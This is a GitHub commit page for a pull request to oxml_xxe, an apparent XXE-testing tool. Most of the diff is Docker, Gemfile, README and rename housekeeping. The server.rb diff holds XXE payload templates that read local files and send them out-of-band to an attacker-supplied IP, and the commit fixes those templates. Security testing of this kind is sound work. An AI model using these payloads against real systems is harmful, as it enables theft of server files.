Skip to content

Commit

Permalink
Merge pull request #42 from nytr0gen/master
Browse files Browse the repository at this point in the history 
Dependency conflicts fix
  • Loading branch information
@BuffaloWill
BuffaloWill authored Mar 26, 2021
2 parents 6fdac34 + 14806bb commit 88b2a68
Show file tree
Hide file tree
Showing 15 changed files with 168 additions and 105 deletions.
4 changes: 4 additions & 0 deletions .gitignore
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,4 @@
db
!db/.gitkeep
output
!output/.gitkeep
16 changes: 16 additions & 0 deletions Dockerfile
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,16 @@
FROM ruby:2.3.8-slim

RUN apt-get update && \
apt-get install -y make git libsqlite3-dev libxslt-dev libxml2-dev zlib1g-dev gcc && \
apt-get clean

WORKDIR /oxml_xxe

# install deps
COPY Gemfile Gemfile.lock ./
RUN bundle install

COPY . .

EXPOSE 4567
CMD ruby server.rb -o 0.0.0.0 -p 4567
19 changes: 9 additions & 10 deletions Gemfile
View file
Original file line number Diff line number Diff line change
@@ -1,12 +1,11 @@
source 'https://rubygems.org'
source "https://rubygems.org"

ruby "2.6.2"
ruby "2.3.8"

# Dependencies at Oct 31, 2017
gem 'sinatra', '1.4.8'
gem 'haml', '5.0.4' # October 13, 2017 - https://rubygems.org/gems/haml/versions
gem 'rubyzip', '1.2.1' # February 08, 2017 - https://rubygems.org/gems/rubyzip/versions
gem 'json','1.8.6'
gem 'nokogiri', '1.8.1' # September 19, 2017 - https://rubygems.org/gems/nokogiri/versions
gem 'data_mapper', '1.2.0'
gem 'dm-sqlite-adapter', '1.2.0'
gem "sinatra", "1.4.8"
gem "haml", "5.0.4"
gem "rubyzip", "1.2.1"
gem "json","1.8.6"
gem "nokogiri", "1.8.1"
gem "data_mapper", "1.2.0"
gem "dm-sqlite-adapter", "1.2.0"
97 changes: 97 additions & 0 deletions Gemfile.lock
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,97 @@
GEM
remote: https://rubygems.org/
specs:
addressable (2.7.0)
public_suffix (>= 2.0.2, < 5.0)
bcrypt (3.1.16)
bcrypt-ruby (3.1.5)
bcrypt (>= 3.1.3)
data_mapper (1.2.0)
dm-aggregates (~> 1.2.0)
dm-constraints (~> 1.2.0)
dm-core (~> 1.2.0)
dm-migrations (~> 1.2.0)
dm-serializer (~> 1.2.0)
dm-timestamps (~> 1.2.0)
dm-transactions (~> 1.2.0)
dm-types (~> 1.2.0)
dm-validations (~> 1.2.0)
data_objects (0.10.17)
addressable (~> 2.1)
dm-aggregates (1.2.0)
dm-core (~> 1.2.0)
dm-constraints (1.2.0)
dm-core (~> 1.2.0)
dm-core (1.2.1)
addressable (~> 2.3)
dm-do-adapter (1.2.0)
data_objects (~> 0.10.6)
dm-core (~> 1.2.0)
dm-migrations (1.2.0)
dm-core (~> 1.2.0)
dm-serializer (1.2.2)
dm-core (~> 1.2.0)
fastercsv (~> 1.5)
json (~> 1.6)
json_pure (~> 1.6)
multi_json (~> 1.0)
dm-sqlite-adapter (1.2.0)
dm-do-adapter (~> 1.2.0)
do_sqlite3 (~> 0.10.6)
dm-timestamps (1.2.0)
dm-core (~> 1.2.0)
dm-transactions (1.2.0)
dm-core (~> 1.2.0)
dm-types (1.2.2)
bcrypt-ruby (~> 3.0)
dm-core (~> 1.2.0)
fastercsv (~> 1.5)
json (~> 1.6)
multi_json (~> 1.0)
stringex (~> 1.4)
uuidtools (~> 2.1)
dm-validations (1.2.0)
dm-core (~> 1.2.0)
do_sqlite3 (0.10.17)
data_objects (= 0.10.17)
fastercsv (1.5.5)
haml (5.0.4)
temple (>= 0.8.0)
tilt
json (1.8.6)
json_pure (1.8.6)
mini_portile2 (2.3.0)
multi_json (1.15.0)
nokogiri (1.8.1)
mini_portile2 (~> 2.3.0)
public_suffix (4.0.6)
rack (1.6.13)
rack-protection (1.5.5)
rack
rubyzip (1.2.1)
sinatra (1.4.8)
rack (~> 1.5)
rack-protection (~> 1.4)
tilt (>= 1.3, < 3)
stringex (1.5.1)
temple (0.8.2)
tilt (2.0.10)
uuidtools (2.2.0)

PLATFORMS
ruby

DEPENDENCIES
data_mapper (= 1.2.0)
dm-sqlite-adapter (= 1.2.0)
haml (= 5.0.4)
json (= 1.8.6)
nokogiri (= 1.8.1)
rubyzip (= 1.2.1)
sinatra (= 1.4.8)

RUBY VERSION
ruby 2.3.5p376

BUNDLED WITH
1.16.0
56 changes: 12 additions & 44 deletions README.md
View file
Original file line number Diff line number Diff line change
@@ -1,9 +1,9 @@
# Archived

This project is archived. If someone has a working and _maintained_ fork please let me know and I will point people there. Thank you to all of you. This was a fun project and a technique that yieled (and still yields) interesting research.
This project is archived. If someone has a working and _maintained_ fork please let me know and I will point people there. Thank you to all of you. This was a fun project and a technique that yieled (and still yields) interesting research.

# oxml_xxe
This tool is meant to help test XXE vulnerabilities in ~~OXML document~~ file formats. Currently supported:
This tool is meant to help test XXE vulnerabilities in **OXML document** file formats. Currently supported:

- DOCX/XLSX/PPTX
- ODT/ODG/ODP/ODS
Expand All @@ -13,58 +13,26 @@ This tool is meant to help test XXE vulnerabilities in ~~OXML document~~ file fo
- JPG (experimental)
- GIF (experimental)

BH USA 2015 Presentation:

[Exploiting XXE in File Upload Functionality (Slides)](http://oxmlxxe.github.io/reveal.js/slides.html#/) [(Recorded Webcast)](https://www.blackhat.com/html/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.html)
BH USA 2015 Presentation: [Exploiting XXE in File Upload Functionality (Slides)](http://oxmlxxe.github.io/reveal.js/slides.html#/) [(Recorded Webcast)](https://www.blackhat.com/html/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.html)

Blog Posts on the topic:

[Exploiting XXE Vulnerabilities in OXML Documents - Part 1](http://www.silentrobots.com/blog/2015/03/04/oxml_xxe/)

[Exploiting CVE-2016-4264 With OXML_XXE](https://www.silentrobots.com/blog/2016/10/02/exploiting-cve-2016-4264-with-oxml-xxe/)
- [Exploiting XXE Vulnerabilities in OXML Documents](http://www.silentrobots.com/blog/2015/03/04/oxml_xxe/)
- [Exploiting CVE-2016-4264 With OXML_XXE](https://www.silentrobots.com/blog/2016/10/02/exploiting-cve-2016-4264-with-oxml-xxe/)

# Developer Build

OXML_XXE was re-written in Ruby using Sinatra, Bootstrap, and Haml. Installation should be easy:

- You will need a copy of Ruby. RVM is suggested (https://rvm.io/rvm/install). ruby version 2.3.5 is supported.

- If you are running Ubuntu (or also verified on Kali) you will need a couple of dependencies:
```
apt-get install libsqlite3-dev libxslt-dev libxml2-dev zlib1g-dev gcc
```

To install RVM:
```
gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
\curl -sSL https://get.rvm.io | bash
```
OXML_XXE was re-written in Ruby using Sinatra, Bootstrap, and Haml. Installation should be easy with Docker:

Install Ruby 2.3.5 with RVM
```
rvm install 2.3.5
rvm use 2.3.5
```

Install dependencies and start the server:
```
cd oxml_xxe
gem install bundler
bundle install
ruby server.rb
```

Browse to http://127.0.0.1:4567 to get started.
1. Run `docker-compose up`
2. Browse to http://localhost:4567/ to get started.

# Main Modes

There are two main modes:

## Build a File

Build mode adds a DOCTYPE and inserts the XML Entity into the file of the users choice.
**1. Build a File**

## String Replace in File
Build mode adds a `DOCTYPE` and inserts the XML Entity into the file of the users choice.

String replacement mode goes through and looks for the symbol § in the document. The XML Entity ("&xxe;") replaces any instances of this symbol. Note, you can open the document in and insert § anywhere to have it replaced. The common use case would be a web application which reads in a xlsx and then prints the results to the screen. Exploiting the XXE it would be possible to have the contents printed to the screen.
**2. String Replace in File**

String replacement mode goes through and looks for the symbol `§` in the document. The XML Entity ("&xxe;") replaces any instances of this symbol. Note, you can open the document in and insert `§` anywhere to have it replaced. The common use case would be a web application which reads in a `xlsx` and then prints the results to the screen. Exploiting the XXE it would be possible to have the contents printed to the screen.
0 db/blank → db/.gitkeep
View file
File renamed without changes.
11 changes: 11 additions & 0 deletions docker-compose.yml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
version: "2.2"

services:

web:
build: .
volumes:
- ./db:/oxml_xxe/db
- ./output:/oxml_xxe/output
ports:
- "127.0.0.1:4567:4567"
10 changes: 0 additions & 10 deletions docker/Dockerfile
View file

This file was deleted.

14 changes: 0 additions & 14 deletions docker/README.md
View file

This file was deleted.

8 changes: 0 additions & 8 deletions docker/docker-compose.yml
View file

This file was deleted.

0 model/master.rb → lib/model.rb
View file
File renamed without changes.
0 output/blank → output/.gitkeep
View file
File renamed without changes.
27 changes: 13 additions & 14 deletions server.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -8,7 +8,7 @@
require 'json'

require './lib/util'
require './model/master'
require './lib/model'

if not File.file?('./db/master.db')
puts "|+| Database does not exist, initializing a blank one."
Expand All @@ -18,7 +18,6 @@
end

# TODO apply to all xml in docx
# TODO OOB is incorrect
# TODO explain each menu item in help
# TODO soft link content types

Expand All @@ -36,8 +35,8 @@ def read_payloads()
pl["Canary Parameter Entity"] = ['<!DOCTYPE root [<!ENTITY % xxe "test"> %xxe;]>', "A parameter entity check. This is valuable because the entity is checked immediately when the DOCTYPE is parsed. No malicious application but useful to check for."]
pl["Plain External Parameter Entity"] = ['<!DOCTYPE root [<!ENTITY % a SYSTEM "FILE"> %a;]>', "A simple external parameter entity. Note, the file is the value for the payload; IP and PROTOCOL are ignored by OXML XXE. Useful because the entity is checked immediately when the DOCTYPE is parsed. "]
pl["Recursive Parameter Entity"] = ['<!DOCTYPE root [<!ENTITY % a "PARAMETER"> <!ENTITY % b "RECURSIVE %a;"> %b;]>',"Technically recursive parameter entities are not allowed by the XML spec. Should never work. Precursor to the billion laughs attack."]
pl["Out of Bounds Attack (using file://)"] = ['<!DOCTYPE root [<!ENTITY % file SYSTEM "file://FILE"><!ENTITY % dtd SYSTEM "IP">%a;]>',"OOB is a useful technique to exfiltrate files when attacking blind. This is accomplished by leveraging the file:// protocol. See References."]
pl["Out of Bounds Attack (using php://filter)"] = ['<!DOCTYPE root [<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=FILE"><!ENTITY % dtd SYSTEM "IP">%a;]>',"OOB is a useful technique to exfiltrate files when attacking blind. This is accomplished by leveraging the php filter \"convert.base64-encode\", which has been available since PHP 5.0.0. See References."]
pl["Out of Bounds Attack (using file://)"] = ['<!DOCTYPE root [<!ENTITY % file SYSTEM "file://FILE"><!ENTITY % dtd SYSTEM "IP">%dtd;]>',"OOB is a useful technique to exfiltrate files when attacking blind. This is accomplished by leveraging the file:// protocol. Details about building the dtd file at https://portswigger.net/web-security/xxe/blind."]
pl["Out of Bounds Attack (using php://filter)"] = ['<!DOCTYPE root [<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=FILE"><!ENTITY % dtd SYSTEM "IP">%dtd;]>',"OOB is a useful technique to exfiltrate files when attacking blind. This is accomplished by leveraging the php filter \"convert.base64-encode\", which has been available since PHP 5.0.0. See References."]
return pl
end

Expand All @@ -64,7 +63,7 @@ def oxml_file_defaults()
@types = settings.types
@payloads = settings.payloads
@protos = settings.protocols
haml :build, :encode_html => true
haml :build
end

post '/build' do
Expand Down Expand Up @@ -114,7 +113,7 @@ def oxml_file_defaults()
@types = settings.types
@payloads = settings.payloads
@protos = settings.protocols
haml :replace, :encode_html => true
haml :replace
end

post '/replace' do
Expand Down Expand Up @@ -158,7 +157,7 @@ def oxml_file_defaults()
end

get '/xss' do
haml :xss, :encode_html => true
haml :xss
end

post '/xss' do
Expand Down Expand Up @@ -201,7 +200,7 @@ def oxml_file_defaults()
@types = settings.poc_types
@protos = settings.protocols

haml :poc, :encode_html => true
haml :poc
end

post '/poc' do
Expand Down Expand Up @@ -232,9 +231,9 @@ def oxml_file_defaults()
end

get '/list' do
@files = Oxfile.all()
@files = Oxfile.all(:order => :id.desc)

haml :list, :encode_html => true
haml :list
end

get '/download' do
Expand All @@ -245,7 +244,7 @@ def oxml_file_defaults()
end

get '/display' do
haml :display, :encode_html => true
haml :display
end

post '/display_file' do
Expand All @@ -260,7 +259,7 @@ def oxml_file_defaults()
File.open(rand_file, 'wb') {|f| f.write(input_file) }

@files = display_file(rand_file)
haml :display_file, :encode_html => true
haml :display_file
end

get '/view_file' do
Expand All @@ -272,7 +271,7 @@ def oxml_file_defaults()
rand_file = file.location

@files = display_file(rand_file)
haml :display_file, :encode_html => true
haml :display_file
end

get '/delete' do
Expand All @@ -291,7 +290,7 @@ def oxml_file_defaults()
end

get '/overwrite' do
haml :overwrite, :encode_html => true
haml :overwrite
end

post '/overwrite' do
Expand Down
Loading

0 comments on commit 88b2a68

Please sign in to comment.